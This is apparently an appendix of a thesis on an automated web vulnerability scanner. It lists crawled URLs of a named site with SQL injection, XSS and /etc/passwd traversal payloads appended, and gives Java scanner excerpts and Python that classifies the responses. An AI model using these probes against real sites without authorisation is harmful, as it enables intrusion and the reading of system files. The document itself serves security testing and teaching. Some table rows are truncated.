APPENDIX A: Tables

Table 4.7 Crawling results, sample 1

No.  Website URL
1    http://www.raahauges.com/index.php
2    http://www.raahauges.com/supporters.php
3    http://www.raahauges.com/shotgun-range.php
4    http://www.raahauges.com/hunting.php
5    http://www.raahauges.com/sports-fair.php
6    http://www.raahauges.com/events-calendar.php
7    http://www.raahauges.com/contact.php
8    http://www.raahauges.com/news.php
9    http://www.raahauges.com/shoot-results.php
10   http://www.raahauges.com/find-raahauges.php
11   http://www.raahauges.com/view-news.php?id=9
12   http://www.raahauges.com/view-news.php?id=8
13   http://www.raahauges.com/view-news.php?id=10
14   http://www.raahauges.com/SportsFairFlyer2014.pdf
15   http://www.raahauges.com/index.php?prm=09&chm=-1#mini-calendar
16   http://www.raahauges.com/index.php?prm=09&chm=1#mini-calendar
17   http://www.raahauges.com/events-calendar.php?d=2014-09-13
18   http://www.raahauges.com/events-calendar.php?d=2014-09-14
19   http://www.raahauges.com/events-calendar.php?d=2014-09-17
20   http://www.raahauges.com/events-calendar.php?d=2014-09-18
21   http://www.raahauges.com/events-calendar.php?d=2014-09-19
22   http://www.raahauges.com/events-calendar.php?d=2014-09-20
23   http://www.raahauges.com/events-calendar.php?d=2014-09-21
Table 4.8 Results of the SQL Injection attack scenario, sample 1 (a single quote, %27, appended to every crawled URL)

No.  Manipulated website URL
1    http://www.raahauges.com/index.php%27
2    http://www.raahauges.com/supporters.php%27
3    http://www.raahauges.com/shotgun-range.php%27
4    http://www.raahauges.com/hunting.php%27
5    http://www.raahauges.com/sports-fair.php%27
6    http://www.raahauges.com/events-calendar.php%27
7    http://www.raahauges.com/contact.php%27
8    http://www.raahauges.com/news.php%27
9    http://www.raahauges.com/shoot-results.php%27
10   http://www.raahauges.com/find-raahauges.php%27
11   http://www.raahauges.com/view-news.php?id=9%27
12   http://www.raahauges.com/view-news.php?id=8%27
13   http://www.raahauges.com/view-news.php?id=10%27
14   http://www.raahauges.com/SportsFairFlyer2014.pdf%27
15   http://www.raahauges.com/index.php?prm=09&chm=-1#mini-calendar%27
16   http://www.raahauges.com/index.php?prm=09&chm=1#mini-calendar%27
17   http://www.raahauges.com/events-calendar.php?d=2014-09-13%27
18   http://www.raahauges.com/events-calendar.php?d=2014-09-14%27
19   http://www.raahauges.com/events-calendar.php?d=2014-09-17%27
20   http://www.raahauges.com/events-calendar.php?d=2014-09-18%27
21   http://www.raahauges.com/events-calendar.php?d=2014-09-19%27
22   http://www.raahauges.com/events-calendar.php?d=2014-09-20%27
23   http://www.raahauges.com/events-calendar.php?d=2014-09-21%27
Table 4.9 Results of the Cross Site Scripting attack scenario, sample 1 (the percent-encoded payload " '><h1>Testing</h1>" appended to every crawled URL)

No.  Manipulated website URL
1    http://www.raahauges.com/index.php%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
2    http://www.raahauges.com/supporters.php%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
3    http://www.raahauges.com/shotgun-range.php%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
4    http://www.raahauges.com/hunting.php%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
5    http://www.raahauges.com/sports-fair.php%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
6    http://www.raahauges.com/events-calendar.php%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
7    http://www.raahauges.com/contact.php%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
8    http://www.raahauges.com/news.php%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
9    http://www.raahauges.com/shoot-results.php%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
10   http://www.raahauges.com/find-raahauges.php%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
11   http://www.raahauges.com/view-news.php?id=9%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E
12   http://www.raahauges.com/view-news.php?id=8%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
13   http://www.raahauges.com/view-news.php?id=10%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
14   http://www.raahauges.com/SportsFairFlyer2014.pdf%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
15   http://www.raahauges.com/index.php?prm=09&chm=-1#mini-calendar%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
16   http://www.raahauges.com/index.php?prm=09&chm=1#mini-calendar%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
17   http://www.raahauges.com/events-calendar.php?d=2014-09-13%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
18   http://www.raahauges.com/events-calendar.php?d=2014-09-14%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
19   http://www.raahauges.com/events-calendar.php?d=2014-09-17%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
20   http://www.raahauges.com/events-calendar.php?d=2014-09-18%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
21   http://www.raahauges.com/events-calendar.php?d=2014-09-19%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2
22   http://www.raahauges.com/events-calendar.php?d=2014-09-20%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
23   http://www.raahauges.com/events-calendar.php?d=2014-09-21%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
24   http://www.raahauges.com/events-calendar.php?d=2014-09-28%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E
Table 4.10 Results of the File Inclusion attack scenario, sample 1 (a directory-traversal path to /etc/passwd appended to every crawled URL)

No.  Manipulated website URL
1    http://www.raahauges.com/index.php../../../../../../../../../../etc/passwd
2    http://www.raahauges.com/supporters.php../../../../../../../../../../etc/passwd
3    http://www.raahauges.com/shotgun-range.php../../../../../../../../../../etc/passwd
4    http://www.raahauges.com/hunting.php../../../../../../../../../../etc/passwd
5    http://www.raahauges.com/sports-fair.php../../../../../../../../../../etc/passwd
6    http://www.raahauges.com/events-calendar.php../../../../../../../../../../etc/passwd
7    http://www.raahauges.com/contact.php../../../../../../../../../../etc/passwd
8    http://www.raahauges.com/news.php../../../../../../../../../../etc/passwd
10   http://www.raahauges.com/find-raahauges.php../../../../../../../../../../etc/passwd
11   http://www.raahauges.com/view-news.php?id=9../../../../../../../../../../etc/passwd
12   http://www.raahauges.com/view-news.php?id=8../../../../../../../../../../etc/passwd
13   http://www.raahauges.com/view-news.php?id=10
14   http://www.raahauges.com/SportsFairFlyer2014.pdf../../../../../../../../../../etc/passwd
15   http://www.raahauges.com/index.php?prm=09&chm=-1#mini-calendar../../../../../../../../../../etc/passwd
16   http://www.raahauges.com/index.php?prm=09&chm=1#mini-calendar../../../../../../../../../../etc/passwd
17   http://www.raahauges.com/events-calendar.php?d=2014-09-13../../../../../../../../../../etc/passwd
18   http://www.raahauges.com/events-calendar.php?d=2014-09-14../../../../../../../../../../etc/passwd
19   http://www.raahauges.com/events-calendar.php?d=2014-09-17../../../../../../../../../../etc/passwd
20   http://www.raahauges.com/events-calendar.php?d=2014-09-18../../../../../../../../../../etc/passwd
21   http://www.raahauges.com/events-calendar.php?d=2014-09-19../../../../../../../../../../etc/passwd
22   http://www.raahauges.com/events-calendar.php?d=2014-09-20../../../../../../../../../../etc/passwd
23   http://www.raahauges.com/events-calendar.php?d=2014-09-21../../../../../../../../../../etc/passwd
24   http://www.raahauges.com
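Tables 4.8, 4.9 and 4.10 are all produced from Table 4.7 by one rule: the payload is appended verbatim to the end of every crawled URL. The Python script below is an added illustration of that rule and is not part of the thesis or of its Java scanner. It rebuilds the three scenarios for a constructed subset of the crawled URLs (rows 1, 11, 15 and 17 of Table 4.7), percent-decodes the XSS payload so that the reader can see what the server actually receives, and classifies where each appended payload ends up. That last check is the caveat a tester would want: a payload appended after a "#" (rows 15 and 16) is a URL fragment and is never sent in the HTTP request, and a payload appended to a bare ".php" path (rows 1 to 10 and 14) only changes the requested file name, so it is never consumed by a database query or an include(). The function inject_into_params is a hypothetical refinement that goes beyond the tables by placing the payload into each query-string value instead.

```python
from urllib.parse import parse_qsl, quote, unquote, urlsplit, urlunsplit

# Payloads exactly as they appear in Tables 4.8, 4.9 and 4.10.
PAYLOADS = {
    "sqli": "%27",                                   # a single quote
    "xss": "%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E",
    "lfi": "../../../../../../../../../../etc/passwd",
}

# Constructed subset of the crawled URLs in Table 4.7 (rows 1, 11, 15 and 17).
CRAWLED = [
    "http://www.raahauges.com/index.php",
    "http://www.raahauges.com/view-news.php?id=9",
    "http://www.raahauges.com/index.php?prm=09&chm=-1#mini-calendar",
    "http://www.raahauges.com/events-calendar.php?d=2014-09-13",
]


def decode_payload(payload: str) -> str:
    """Percent-decode a payload to the text the server would see."""
    return unquote(payload)


def naive_scenario(urls, kind):
    """Reproduce Tables 4.8-4.10: the payload is appended verbatim to every URL."""
    return [u + PAYLOADS[kind] for u in urls]


def payload_position(attack_url: str) -> str:
    """Report where an appended payload landed: 'fragment', 'query' or 'path'.

    A fragment is never transmitted in the HTTP request, so a payload there
    cannot reach the server.  A payload on the path of a .php file only
    changes which file is requested; no query or include() receives it.
    """
    parts = urlsplit(attack_url)
    if parts.fragment:
        return "fragment"
    if parts.query:
        return "query"
    return "path"


def inject_into_params(url: str, kind: str):
    """Hypothetical refinement (not in the thesis): put the decoded payload
    into each query-string value in turn and drop the fragment.  A URL
    without a query string yields no test case at all."""
    parts = urlsplit(url)
    if not parts.query:
        return []
    pairs = parse_qsl(parts.query, keep_blank_values=True)
    decoded = decode_payload(PAYLOADS[kind])
    out = []
    for i in range(len(pairs)):
        mutated = list(pairs)
        name, value = mutated[i]
        mutated[i] = (name, value + decoded)
        # quote() re-encodes ' < > and space; '/' is kept so traversal stays readable
        query = "&".join(f"{n}={quote(v, safe='/')}" for n, v in mutated)
        out.append(urlunsplit((parts.scheme, parts.netloc, parts.path, query, "")))
    return out


def targeted_scenario(urls, kind):
    out = []
    for u in urls:
        out.extend(inject_into_params(u, kind))
    return out


def effective_rows(urls, kind):
    """Rows of the naive scenario whose payload actually lands in a query value."""
    return [u for u in naive_scenario(urls, kind) if payload_position(u) == "query"]


if __name__ == "__main__":
    print("XSS payload decodes to:", repr(decode_payload(PAYLOADS["xss"])))
    for kind in PAYLOADS:
        print(f"\n[{kind}] as in the tables:")
        for u in naive_scenario(CRAWLED, kind):
            print(f"  {payload_position(u):8} {u}")
        print(f"[{kind}] injected into query values:")
        for u in targeted_scenario(CRAWLED, kind):
            print("  ", u)
```

For the four sample URLs only two rows of each naive scenario put the payload in a query value; the fragment row and the bare-path row cannot yield a positive result whatever the server does, which is worth keeping in mind when reading the "Not Vulnerable" entries of the result tables.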
APPENDIX B: Application Source Code Excerpts

1. AutoScannerSQLI.java

public class AutoScannerSQLI extends javax.swing.JFrame {
    private String save[] = new String[250];      // URLs collected by the crawler
    private String testBasic = "", testBlind = "", testBlind2 = "";
    private int hasilPencarian = 0;               // count of URLs judged vulnerable
    private String inputURL = "";
    ArrayList<String> listOfReportsVulnerable = new ArrayList<String>();
    ArrayList<String> listOfReports = new ArrayList<String>();
    read_byPassHttpError identifikasi = new read_byPassHttpError(null);

    // ... (scan button handler)
        listOfReportsVulnerable = new ArrayList<String>(0);
        listOfReports = new ArrayList<String>(0);
        inputURL = url_Site.getText();
        String typeAttack = tipeSerangan.getSelectedItem().toString();
        // Check that the URL is well formed before scanning
        if ((verifyUrl(inputURL) != null) && (typeAttack != null)) {
            JOptionPane.showMessageDialog(null, "Scan Mulai");
            hasilScanSQLi.append("Situs yang di scan " + inputURL + " \n");
            hasilScanSQLi.append("Jenis Serangan SQL Injection \n" + "tipe serangan : " + typeAttack + "\n");
            listOfReportsVulnerable.add("Tipe serangan : " + typeAttack + "\n");
        } else {
            // (invalid-URL handling not shown in the excerpt)
        }
    // ... (crawler: collect every <a href> on the page)
            Elements links = doc.select("a[href]");
            int i = 0;
        } catch (IOException e) {
            e.printStackTrace();
        }

    // Attack scenario: blind SQL injection. Each URL is requested with an
    // always-true and an always-false condition; identical responses (same
    // content or same size) mean the parameter is judged not vulnerable.
    private void attackScenarioBlindTrue() {
        String serangan1 = "%20and%201=1--";
        String serangan2 = "%20and%201=0--";
        int size1 = 0, size2 = 0;
        // ...
        if ((hasilIdentifikasiTrue.equals(hasilIdentifikasiFalse)) || (size1 == size2)) {
            hasilScanSQLi.append(save[i] + " => " + "Tidak Vulnerable\n");          // "Tidak" = "Not"
            listOfReportsVulnerable.add(save[i] + " => " + "Tidak Vulnerable\n");
        } else {
            listOfReportsVulnerable.add(save[i] + " => " + "Vulnerable");
        }
    }
    private void attackScenarioBlindFalse(String serangan) {
        for (int i = 0; i < save.length - 1; i++) {
            // ...
    // Fingerprinting: identify the back-end database server from its responses
    // Analyse the response to decide whether the URL is vulnerable
    private void readResponAttack(String SQLTest) {
2. AutoScannerXSS.java

import java.io.IOException;
import java.util.ArrayList;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
import org.jsoup.Connection;
import org.jsoup.Jsoup;

public class AutoScannerXSS extends javax.swing.JFrame {
    private String listUrlXSS[] = new String[250];   // URLs collected by the crawler
    private String hasilRead = "";
    private String tipeAttack = "";                   // payload chosen in the GUI
    private int hasilPencarian = 0;
    ArrayList<String> listOfReportsVulnerable = new ArrayList<String>();
    ArrayList<String> listOfReports = new ArrayList<String>();

    public AutoScannerXSS() {
        initComponents();
    }

    private void scanXSSActionPerformed(java.awt.event.ActionEvent evt) {
        String situs = urlXSS.getText();
        // ...
            // " '><h1>Testing</h1>" percent-encoded: the payload used in Table 4.9
            attackScenarioXSS("%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E");
        } else if (tipeAttack.equals("<script>alert(123)</script>")) {
            attackScenarioXSS("%20<script>alert(123)</script>");
        } else if (tipeAttack.equals("'<script>alert(123);</script>")) {
            attackScenarioXSS("%20'<script>alert(123);</script>");
        }
    }

    // Append the payload to every crawled URL and check the response
    private void attackScenarioXSS(String serangan) {
        for (int i = 0; i < listUrlXSS.length - 1; i++) {
            if (listUrlXSS[i] != null) {
                // String testXSS = listUrlXSS[i] + serangan;
                // listUrlXSS2[i] = listUrlXSS[i] + serangan;
                // readResponAttack(testXSS);
                byPassError(listUrlXSS[i], serangan);
            } else {
                break;
            }
        }
    }

    private void readResponAttack(String SQLTest) {
        try { // the URL must include the http protocol
            Connection.Response res = Jsoup.connect(SQLTest).timeout(5000)
                    .ignoreHttpErrors(true).followRedirects(true)
                    .userAgent("Mozilla").execute();
            // get page title
            String title = res.parse().title();
            System.out.println("title : " + title);
            // Search the raw response body for the payload. The original excerpt
            // searched doc.body().text(), which strips HTML tags, so the tags in
            // "<h1>Testing</h1>" could only match there if the server had
            // HTML-escaped them, i.e. in the non-vulnerable case.
            String isi = res.body();
            // Pattern.quote(): the payloads contain regex metacharacters ( ) < > '
            Pattern p = Pattern.compile(Pattern.quote(tipeAttack));
            Matcher m = p.matcher(isi);
            if (m.find()) {
                System.out.println("Match Found at position " + m.start());
                hasilXSS.append(" Vulnerable");
            } else {
                hasilXSS.append("NO Vulnerable");
            }
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}
3. AutoScannerFileInclusion.java

import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.net.HttpURLConnection;
import java.net.URL;
import java.util.ArrayList;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
import javax.swing.JOptionPane;
import org.jsoup.Jsoup;
import org.jsoup.nodes.Document;
import org.jsoup.nodes.Element;
import org.jsoup.select.Elements;

public class AutoScannerFileInclusion extends javax.swing.JFrame {
    private String listUrl[] = new String[250];   // URLs collected by the crawler (at most 250)
    private String inputURL = "";
    private int hasilPencarian = 0;               // count of URLs judged vulnerable
    ArrayList<String> listOfReportsVulnerable = new ArrayList<String>();
    ArrayList<String> listOfReports = new ArrayList<String>();

    public AutoScannerFileInclusion() {
        initComponents();
    }

    // ... (scan button handler)
        listOfReportsVulnerable = new ArrayList<String>(0);
        listOfReports = new ArrayList<String>(0);
        inputURL = url_Site.getText();
        String serangan = tipeSerangan.getSelectedItem().toString();
        // Check that the URL is well formed before scanning
        if ((verifyUrl(inputURL) != null) && (serangan != null)) {
            JOptionPane.showMessageDialog(null, "Scan Mulai");
            hasilScan.append("Situs yang di scan " + inputURL + " \n");
            hasilScan.append("Jenis Serangan File Inclusion \n" + "Tipe serangan : " + serangan + "\n");
        } else {
            JOptionPane.showMessageDialog(null, "The entered URL is not valid. Please enter again:");
            url_Site.requestFocus();
            return;   // do not crawl an invalid URL (the excerpt fell through to the crawler)
        }
        websiteCrawler(inputURL);
        // Attack phase
        if (serangan.equals("File Inclusion")) {
            attackScenarioFileInclusion("../");
            tampil();
        } else if (serangan.equals("File Inclusion with Null")) {
            attackScenarioFileInclusion("../%00");   // null byte to cut off an appended extension
            // ...

    // Crawler: collect every link on the start page that stays on the same site
    private void websiteCrawler(String url) {
        Document doc;
        try {
            doc = Jsoup.connect(url).timeout(5000)
                    .ignoreHttpErrors(true).followRedirects(true)
                    .userAgent("Mozilla").get();
            // get page title
            String title = doc.title();
            // System.out.println("title : " + title);
            // get all links
            Elements links = doc.select("a[href]");
            int i = 0;
            for (Element link : links) {
                // System.out.println("\nlink : " + link.attr("abs:href"));
                if (link.attr("abs:href").contains(url)) {
                    listUrl[i] = link.attr("abs:href");
                    i++;
                }
            }
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

    // Attack scenario (data validation testing): test every crawled URL
    private void attackScenarioFileInclusion(String serangan) {
        for (int i = 0; i < listUrl.length - 1; i++) {
            if (listUrl[i] != null) {
                String testFileInclusion = listUrl[i];
                byPassError(testFileInclusion, serangan);
            } else {
                break;
            }
        }
    }

    // Fingerprint the back-end response (created by Indra Nababan).
    // Requests url+serangan, follows one redirect by hand, reads the body even
    // for HTTP error statuses, and reports VULNERABLE when the body contains a
    // PHP "<b>Warning</b>" message.
    public void byPassError(String url, String serangan) {
        String s = url + serangan;
        BufferedReader in = null;
        try {
            URL obj = new URL(s);
            HttpURLConnection conn = (HttpURLConnection) obj.openConnection();
            conn.setReadTimeout(5000);   // the excerpt used 0 (no timeout), which can hang the scan
            conn.setRequestProperty("User-Agent", "Mozilla/5.0 ( compatible ) ");
            conn.setRequestProperty("Accept", "*/*");
            System.out.println("Request URL ... " + s);
            boolean redirect = false;
            // normally, 3xx is redirect
            int status = conn.getResponseCode();
            if (status != HttpURLConnection.HTTP_OK) {
                if (status == HttpURLConnection.HTTP_MOVED_TEMP
                        || status == HttpURLConnection.HTTP_MOVED_PERM
                        || status == HttpURLConnection.HTTP_SEE_OTHER) {
                    redirect = true;   // lost in the excerpt; without it the block below never runs
                }
            }
            System.out.println("Response Code ... " + status);
            if (redirect) {
                // get redirect url from "location" header field
                String newUrl = conn.getHeaderField("Location");
                // get the cookie if need, for login
                String cookies = conn.getHeaderField("Set-Cookie");
                // open the new connection again
                conn = (HttpURLConnection) new URL(newUrl).openConnection();
                if (cookies != null) {
                    conn.setRequestProperty("Cookie", cookies);
                }
                conn.setRequestProperty("User-Agent", "Mozilla/5.0 ( compatible ) ");
                conn.setRequestProperty("Accept", "*/*");
                System.out.println("Redirect to URL : " + newUrl);
            }
            boolean isError = conn.getResponseCode() >= 400;
            // The normal input stream doesn't work in error cases; the error
            // stream still carries the body (and any PHP warning in it).
            if (isError) {
                in = new BufferedReader(new InputStreamReader(conn.getErrorStream()));
            } else {
                // conn.getInputStream() rather than obj.openStream(): the latter would
                // open a second connection to the original URL and ignore the redirect
                in = new BufferedReader(new InputStreamReader(conn.getInputStream()));
            }
            String inputLine;
            StringBuffer html = new StringBuffer();
            while ((inputLine = in.readLine()) != null) {
                html.append(inputLine + "\n");
            }
            in.close();
            String hasil = html.toString();
            Pattern p = Pattern.compile("<b>Warning</b>");
            Matcher m = p.matcher(hasil);
            if (m.find()) {
                hasilScan.append(s + " => " + "VULNERABLE" + "\n");
                listOfReportsVulnerable.add(url + " => " + "VULNERABLE" + "\n");
                listOfReports.add(url + " => " + "VULNERABLE" + "\n");
                hasilPencarian += 1;
            } else {
                hasilScan.append(s + " => " + "Not Vulnerable\n");
                listOfReports.add(url + " => " + "Not VULNERABLE" + "\n");
            }
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}
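The excerpts above decide "vulnerable" from the HTTP response alone: byPassError() reports a hit when the body contains a literal <b>Warning</b> (the rule used for both the SQL injection and the file inclusion scenarios), readResponAttack() in AutoScannerXSS looks for a reflected copy of the payload, and attackScenarioBlindTrue() treats the URL as blind-injectable when the responses to "and 1=1--" and "and 1=0--" differ in content and in size. The Python below is an added example, not code from the thesis, that implements those three decisions offline against constructed response bodies so that each rule can be exercised without a target. It adds two refinements that the Java does not have: the XSS marker is searched in the raw HTML and an entity-encoded reflection counts as not vulnerable, and for file inclusion the body is also tested for /etc/passwd content, because a successful include returns the file and no warning at all. The stricter blind rule (true case must equal the untouched page) is likewise an addition, not the thesis's criterion.

```python
import re
from urllib.parse import unquote

# Marker that byPassError() greps for: PHP prints "<b>Warning</b>: ..." when
# display_errors is on.
WARNING_RE = re.compile(r"<b>Warning</b>")

# XSS payload from Table 4.9, decoded to the text the server reflects.
XSS_PAYLOAD = "%20%27%3E%3C%68%31%3E%54%65%73%74%69%6E%67%3C%2F%68%31%3E"
XSS_MARKER = unquote(XSS_PAYLOAD).strip()          # "'><h1>Testing</h1>"

# First line of a Unix passwd file; a successful ../../etc/passwd include
# returns this instead of a warning.
PASSWD_RE = re.compile(r"^root:[^:\n]*:0:0:", re.MULTILINE)


def error_based(body: str) -> bool:
    """Rule used by the appendix code for SQLi and file inclusion: a PHP warning leaked."""
    return WARNING_RE.search(body) is not None


def reflected_xss(body: str) -> bool:
    """Vulnerable only if the marker comes back unescaped in the raw HTML.
    An entity-encoded copy (&lt;h1&gt;...) means output encoding is in place."""
    return XSS_MARKER in body


def blind_sqli(baseline: str, body_true: str, body_false: str) -> bool:
    """Blind rule from attackScenarioBlindTrue(): identical content or identical
    size for 'and 1=1--' versus 'and 1=0--' means not vulnerable.  The added
    condition (true case reproduces the untouched page, false case does not)
    removes false positives from pages that differ on every request."""
    appendix_rule = body_true != body_false and len(body_true) != len(body_false)
    return appendix_rule and body_true == baseline and body_false != baseline


def passwd_leaked(body: str) -> bool:
    return PASSWD_RE.search(body) is not None


def classify(kind: str, body: str = "", *, baseline: str = "",
             body_true: str = "", body_false: str = "") -> bool:
    """Map a scenario name to its decision rule."""
    if kind == "sqli":
        return error_based(body)
    if kind == "blind":
        return blind_sqli(baseline, body_true, body_false)
    if kind == "xss":
        return reflected_xss(body)
    if kind == "lfi":
        return error_based(body) or passwd_leaked(body)
    raise ValueError(f"unknown scenario {kind!r}")


def report_line(url: str, vulnerable: bool) -> str:
    """Same "url => VULNERABLE / Not Vulnerable" format as the Java reports."""
    return f"{url} => {'VULNERABLE' if vulnerable else 'Not Vulnerable'}"


# Constructed response bodies; no server is contacted.
BASELINE = "<html><body><h2>News 9</h2><p>Sports fair this weekend.</p></body></html>"
SQL_ERROR = ("<html><body><b>Warning</b>: mysql_fetch_array() expects parameter 1 "
             "to be resource, boolean given in <b>view-news.php</b></body></html>")
EMPTY_PAGE = "<html><body></body></html>"
XSS_RAW = "<html><body><input value=' '><h1>Testing</h1>'></body></html>"
XSS_ESCAPED = "<html><body><input value=' &#x27;&gt;&lt;h1&gt;Testing&lt;/h1&gt;'></body></html>"
PASSWD_DUMP = "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"

if __name__ == "__main__":
    u = "http://www.raahauges.com/view-news.php?id=9"
    print(report_line(u + "%27", classify("sqli", SQL_ERROR)))
    print(report_line(u + "%20and%201=1--",
                      classify("blind", baseline=BASELINE, body_true=BASELINE, body_false=EMPTY_PAGE)))
    print(report_line(u + XSS_PAYLOAD, classify("xss", XSS_RAW)))
    print(report_line(u + XSS_PAYLOAD, classify("xss", XSS_ESCAPED)))
    print(report_line(u + "../../../../../../../../../../etc/passwd", classify("lfi", PASSWD_DUMP)))
```

The warning-string rule only works while the target runs PHP with display_errors enabled; a site that logs errors instead of printing them will be reported "Not Vulnerable" by both byPassError() and error_based() even when the injection succeeded, which is why the passwd check and the blind comparison are worth running alongside it.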